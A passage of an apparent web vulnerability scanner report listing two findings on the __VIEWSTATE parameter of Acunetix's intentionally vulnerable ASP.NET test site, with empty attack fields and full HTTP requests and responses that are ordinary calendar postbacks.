</TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8196&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAiyl0StoIZGRkFu10AKy%2FWNUnIIYSoG9f%2BgCh6Bs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKulvf1CwK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9%2FTmSpN%2BjZZiKY3%2FIeAXAojtnGcQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:22 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAiyl0StoIZGRkFu10AKy/WNUnIIYSoG9f+gCh6Bs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKulvf1CwK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w9/TmSpN+jZZiKY3/IeAXAojtnGcQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:White" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8184&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAliwGQdoIZGRkQlsxgG2gquLTLgmoV%2FIz9wb%2BuQc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLkz%2B%2BlCAK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w%2Bu%2FMADCHtIYYoZwNLZLwGFGhgMVA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:12 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgBAliwGQdoIZGRkQlsxgG2gquLTLgmoV/Iz9wb+uQc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLkz++lCAK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w+u/MADCHtIYYoZwNLZLwGFGhgMVA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:White" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> 